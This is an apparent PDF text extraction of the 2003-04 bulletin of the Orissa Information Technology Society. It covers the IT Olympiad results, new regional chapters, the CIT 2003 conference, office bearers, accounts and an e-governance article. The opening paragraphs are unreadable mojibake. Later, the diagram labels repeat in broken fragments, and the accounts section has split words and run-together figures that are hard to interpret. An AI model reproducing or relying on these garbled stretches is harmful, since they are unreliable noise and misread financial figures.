OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 5: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

Orissa Information Technology Society(OITS)

From April 2003 to March 2004

A Orissa Information Technology Olympiad(Held on 7th September 2003 )

Orissa Information Technology Society(OITS) conducted the annual quiz test at senior(MCA BE BSc(Eng) and BSc(hons)) and junior(upto class XII) levels with separate questionson 7th September 2003 The test to be held onthe last sunday of august or the first sunday ofseptember was originally scheduled to be on31st august but was shifted by a week as ganeshpuja was there on that day We contactedBerhampur Puri SambalpurBurla RourkelaSarang Cuttack Raygada Balasore DamanjodiParadeep Angul and Bhubaneswar About 1200students registered for the same and aroundeleven hundred students appeared This yearthere was a very positive response from RourkelaSambalpurBurla Raygada and Balasore andsome other places as additional venues ProfSudarshan Padhy Coordinator IT Olympiadmainly organised this activity and he was ablyassisted by many volunteers including MTech(Comp Sc) students (they were not eligible tocontest) and young faculty members The resultsat senior and junior levels are as below

The first three rank holders in the seniorlevel were

1 Puspita Ray IMCA 9th Semester (Utkal Un)

2 Parthasarathi Dash Un College of Eng BE(cs) 7th Semester (burla)

Activities of OITS 2003-2004

SP Misra

3 Geeta Mohanty MCA 2nd Semester (KIIT bbs)

The first three rank holders in the juniorlevel were

1 Bagdevi Panda Class XII DAV Public SchoolCDA Cuttack

2 Siladitya Mohapatra Class X St Paul SchoolRourkela

3 Amulya Ratna Dash Class X BlessedSacrament High School Puri

Names of the other rank holders may beseen in the appropriate website

B Orissa IT Olympiad Prize Distribution held on 18th january 2004

The IT olympiad prize distribution functionwas held on 18th January 2004 at 230 pm TheChief Guest was Bikramjit Maitra Head InfosysCentre at Bhubaneswar and the guest of honourwas Gautam Parija administrative head InfosysCentre Bhubaneswar Arun SamantarayAdministrator Utkal University presided overthe function All the prize winners along withtheir teachers were invited to the function Alsothe parents of the prize winners at junior levelwere separetely invited There were altogetherabout 70 to 80 participants

The president of oits S P Misra welcomedthe participants Next Sudarshan PadhyCoordinator IT olympiad program spoke aboutthe conduct of the olympiad examination andreferred to the fact that on this occasion therewere about nineteen centres in which thestudents appeared spread all over Orissa

OITS-2004

1

OITS-2004

2

Prizes were distributed by the Chief GuestBikramjit Maitra In the senior category the firstsecond and third rank examinees were givencash prizes of Rs3000- Rs2000- andRs1000- respectively and consolation prizesof Rs500- each for the remaining eightexaminees above along with certificates In thejunior category also the first second and thirdrank examinees were given cash prizes ofRs3000- Rs2000- and Rs1000-respectively and consolation prizes of Rs500- each for the remaining nine examinees alongwith certificates Most of the prize winners tookthese prizes and for those who were absent theamounts along with the certificates were sentby courier

The Chief Guest addressed the gatheringemphasizing the relevance of IT in all phases ofour Society He also mentioned that Infosys hasalways wanted to increase the number ofselected candidates from Orissa if they satisfyminimal norms needed for it He mentioned thatparallel to Olympiad tests the selection processin Infosys takes into account not only thebackground knowledge of the candidates butalso their ability to think and adapt themselvesto learn new techniques in computer scienceGautam Parija also emphasized that for selectionin Infosys the ability of candidates as such shallalways be as important as the knowledge theyhave already acquired

Arun K Samantarai Administrator UtkalUniversity also focussed on the role of IT inSociety He particularly emphasized the needfor closer collaboration with industry to makesuch programs a success While all lauded thisactivity of oits Sri Samantarai emphasized thatassistance could be sought from Industry forsuch programs

S P Misra emphasized on two aspects foran extension of the Olympiad activity (i) Hementioned that there is an attempt to coordinatethis activity with a similar activity at all Indialevel so that they can avail of internationalcompetetion and that (ii) from next year we mayhave a short training program of the beststudents appearing in the olympiad On behalfof Infosys Mr Maitra assured that help for thiscan be available from them

There was then a tea break after which likelast year an interactive session was conductedin the presence of Bikramjit Maitra and GautamParija Here students asked many questionswhich were mainly answered by the visitorsalong with open house discussions participatedby many experts and students

The meeting ended with a vote of thanksby Ajit Nayak treasurer oits as the secretarywas absent

C Opening of SAMBALPUR CHAPTER inaugurated on 29112003

In october 2003 about eleven oits membersfrom sambalpur area wanted that we may openthe sambalpur chapter of oits The president thenlocated the earlier members around sambalpurarea and also asked some members outsideorissa whether they would like to join thischapter The executive committee which met on16112003 then approved that we may open thischapter as per article 6 of the bylaws andconvenor for this chapter B Patel of G M Collegesambalpur was intimated accordingly

The chapter was formally inaugurated byProf M C Dash vice-chancellor sambalpuruniversity in a function at G M College premiseson 29112003 Prof Arun Pujari of hyderabaduniversity was the chief speaker He gave anilluminating semi-technical talk on artificial

OITS-2004

3

intelligence The Secretary Dr B Patel talkedabout the interesting programs that were thereduring cit2003 and also about the futureprograms of the sambalpur chapter PrincipalG M College was the guest of honour and S PMisra president oits presided over the functionProf Pujari had also given a technical talk beforethe inauguration meeting

The chapter began with a seed money ofRs10800+Rs8000 with the first being from theregistration fees of fourteen members and thesecond being a donation by S P Misra as he hada speial attachment to sambalpur as his fatherProf Narayan Misra was the first principal ofGM College which was the beginning of highereducation in that area The name of the accountof sambalpur chapter is oits-sbp

The Secretary has subsequently intimatedthat the following are the office bearers of thechapter

1 President Prof S K Sanyal PrincipalUCE Burla

2 Vice-President Prof C R TripathyUCE Burla

3 Secretary Dr B Patel G M CollegeSambalpur

4 Treasurer Dr A P Dash G M CollegeSambalpur

D WORKSHOP ON PARALLEL COMPUTING AND BIOINFORMATICS

Organised by sambalpur chapter

22nd and 23rd March 2004

Here 141 delegates had registered for theworkshop Out of them there were 10 lifemembers of OIT-sbp 13 faculties from nearbycolleges rest being students from differentbranches like MCA Engnieering Msc comp scPhysics Mathematics Botany and Life Sciences

Professor Sudarsan Padhy UtkalUniversity Vanivihar delivered talks on parallelcomputing in three different sessions

On 220304 in the first session heillustrated the same through different exampleslike weather forecasting image processing etcemphasizing the importance of ParallelAlogorithms over serial Algorithms and takingdifferent examples developed the problems onParallel Algorithm In the second Session somemore developements in the problems of parallelalogorithms with multiprogramming and multiprocessing systems were considered

The uniqueness in the workshop waspractical demonstrations as needed Ajit kumarNayak Silicon Institute of TechnologyBhubaneswar demonstrated in two differentsessions about clustering of different workstations through Linux with the syntax to writeprograms using MPI The programmes weredemonstrated to the students This approachcreates a lot of interest among the students forthe problems of parallel algorithms

There were Two Tea Breaks and One lunchbreak for all the delegates

On 230304 Professor Padhy developed theproblems of parallel algorithms and proved theresults

Ajit Kumar Nayak demonstrated moreprograms of parallel algorithms to the delegates

In the after noon session Prof Padhydelivered a talk on Bio-Informatics which wasfollowed by another talk from Prof APDashGMCollege There were two Tea Breaks and onelunch for all the delegates

A feed back Form were circulated to alldeligates and their views were collected whichwas enthusiastic and positive

OITS-2004

4

The main feature of this workshop was itsmultidisciplinary nature with the delegates alsobelonging to diverse disciplines

E Opening of ROURKELA CHAPTER

In late december 2003 a letter was receivedfrom Prof Sourya Patnaik director rourkelainstitute of management studies (rims) with alist of ten new members from rims along with arequest to open a chapter of oits at rourkela TheInstitute was rated as among the top 40 B-schools and had MCA programs along withbusiness school programs We already had quitea few oits members in nit rourkela and it wasthought that such chapter shall be serving theaims and objectives of oits for the spread of ITin orissa

S Patnaik and sreekumar both of rims actedas convenors of the chapter They furtherrequested that they already had a program forfaculty improvement scheduled for 8th January2004 and it would be nice to inaugurate therourkela chapter of oits then with the facultyimprovement program being the first functionunder its auspices However as per rules oitsexecutive committee needs to approve theopening of a chapter for which time was notavailable Since opening of this chapter wastotally parallel to the opening of the sambalpurchapter the president rang up some executivecommittee members and with their approvalintimated Prof Patnaik that we may do so

The chapter was inaugurated on 8thjanuary 2004 by again Prof M C Dash vice-chancellor sambalpur university The functionwas attended by the president oits whowelcomed the delegates by Prof S Padhy whospoke about IT and oits Prof G Panda whoelaborated on many aspects of IT to emphasizethat IT is so interdisciplinary that it could hardly

be regarded as an independent subject ProfSourya Patnaik presided over the function andintimated that they had requested Prof Panda ofNIT Rourkela to be the president of the chapterand he had kindly agreed

One thing about Prof Pandas talkparticularly impressed me He said that he cantrain computer students to be self-reliant andthrough software development through thistraining earn their own livelihood at acomfortable level I do hope that through hisleadership this will come to happen in whichcase rourkela chapter will lead oits and all ITlovers about a very positive action

The afternoon programe was devoted to theworkshop on financial computation where anexpert from finance introduced the subject andProf Padhy talked about the computationalmodelling of the corresponding theories It wasattended by more than twenty-five participantsspread from different colleges in orissa It is verywell known that economic models have becomehighly mathematical and with the need for wide-scale data bases computational finance isbecoming a very important area of IT

The executive committee of oits met on1212004 where it discusssed about the openingof the rourkela chapter and approved the same

Rourkela chapter started with the seedmoney of Rs11210+Rs8000 the first abovebeing the money transferred from oitsmembership fees and the second being adonation by S P Misra who was Professor at(then) REC Rourkela for ten years He alsothought that the amount should be reasonablesince as per rules at least half of the aboveamount shall be kept as fixed deposit By theway this fixed deposit gives some stability tothe chapters where generally the members shall

OITS-2004

5

try to make the programs self-sustaining Thename of the bank account of the chapter is OITS-Rourkela

Rourkela chapter at present has seventeenmembers The secretary as below has intimatedthat the following office bearers have takencharge

1 President G Panda NIT Rourkela

2 Secretary D P Acharya RIMS

3 Treasurer Barnali Pradhan RIMS

Let us wish rourkela chapter all success

F Opening of BERHAMPUR CHAPTER

Some oits members of BerhampurUniversity NIST and NIC belonging toberhampur met on 29th March and resolved thatthey wish to open the berhampur chapter of oitsThey also elected the following members as officebearers

President M R Patra (BU)Vice-President R K Dash (NIC)Secretary Indraneel Mukhopadhyay (NIST)Treasurer S K Padhi (BU)

I received the above communication fromthe secretary on 3032004 We discussed thematter in the executive committee on 3132004and decided that the opening of the berhampurchapter be approved and that the same may befollowed up by the new executive committee

G OITS BULLETIN

OITS has started bringing out a Bulletinwith semi-technical articles with the first issue(December 2003) being inaugurated duringcit2003 It was initially thought that it would anyearly bulletin but then in the last general bodyit was decided that it may come out during Juneand December of every year This can be viewed

downloaded from the website This along withmany very interesting articles contains an articleby S P Misra indicating the gradual evolution ofoits

H CIT 2003

The Conference organised by OrissaInformation Technology Society (OITS) andSilicon Institute of Technology de facto extendedfrom 21st December to 25th December 2003 On21st there was a Symposium on IT andEducation mainly organised by the SiliconInstitute where there were seven speakers fromdifferent parts of India This was conducted byNeharika Vohra from IIM ahmedabad

In the afternoon the same day there wasan inauguration function for the ConferenceHere N R Mohanty Chairman HAL Bangalorewas the Chief Guest Damodar Acharya Vice-Chancellor Biju Patnaik University ofTechnology was the guest of honour and VinayDeshpande chairman Encore Software Pvt LtdBangalore was the Chief Speaker P K Dashwelcomed all Sudeshna Sarkar spoke about theConference and S P Misra gave a vote of thanksAll the three guests gave wonderful inspiringtalks with a common theme being to have a senseof confidence by all of us that things arehappening will happen and in IT or in otherfields we need not be second to any othercountry

The main Conference was from 22ndDecember to 24th December in Swosti PlazaBhubaneswar During the Conference therewere three keynote talks (by (i) S K TripathyUCR USA (ii) Y Pratt UT Arlington USA (iii)Sajal Das UT Arlington USA) eight invited talksand three advanced tutorials Around 230delegates from 12 countries including Indiaregistered for the Conference and 122 presented

OITS-2004

6

their papers in the different technical sessionsThere was also an industry session with thetheme as India sustaining leadership positionin the global IT market

On 24th afternoon the valedictory functiontook place as the last function of the ConferenceS P Misra President OITS conducted the sameThe program chairs briefly recapitulated thesalient features of the Conference and then asin the last year the results of the two best paperawards were given (i) Amiya K Pujari IT awardof Rs5000- and a certificate for the best paperamong all the papers submitted and presentedin the Conference went to Joydeep Ghosh ofUniversity of Texas Austin USA for the paperentitled A probabilistic approach to privacy-sensitive distributed data mining done incollaboration with Srujana Merigu (ii) NarayanMisra IT award of Rs4000- and a certificatefor the best paper among all the papers submittedfrom Orissa and presented in the Conferencewent to D P Das Silicon Inst of Tech bbsr forthe paper entitled Electricity distribution datamining using soft computing and modifiedwavelet analysis done in collaboration with PK Dash

On 25th December in addition to the threeadvanced tutorials during the Conference sixtutorials were organised two of six hourduration and four of three hour duration atHotel Swosti Plaza All the tutorials wereapproximately with sixty participants each andwere well received

Some more information about theconference can be had from the websiteI Organisation of CITs

In the general body meeting of december23rd 2003 the following observations regardingorganisation of cits were made It was decided

that CIT could be held outside orissa if we findorganiserssponsors However the frequencyof hosting outside orissa can not exceed once inthree years

It was also noted that cit2004 had beendecided by the existing steering committee to beat hyderabad and was appreciated by membersas the exposure of oits members to the IT scenarioin hyderabad will be helpful to take up similaractivities in orissa

Consistent with the spirit of the earlierCITs it was recommended by the general bodythat (i) for academic participants in cit2004 theregistration fees from inside India for academicsbe Rs2000- (ii) oits members as such shall havea discount of 25 and (iii) oits members whodo not have institutional or project support shallhave a discount of 50 subject to their certifyingto that effect

Steering Committee of CITs It was alsofelt desirable that the constitution of the steeringcommittee practised since december 1999 needsto be modified It was thought desirable to havefour permanent members here and some rotatingmembers After some discussions it was thoughtthat the permanent members may be (two fromUSA and two from India)

1 Prasant Mohapatra2 R N Mohapatra (Steering Chair)3 G Panda (NIT rourkela)4 S P Misra

It was also decided that the rotatingmembers of the nth cit shall be the generalchair(s) the program chairs and the organisingchair of the (n-1)th cit along with the incumbentpresident of oits during the period of theconference

Thus the general body resolution ofdecember 1999 now stands replaced by the

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

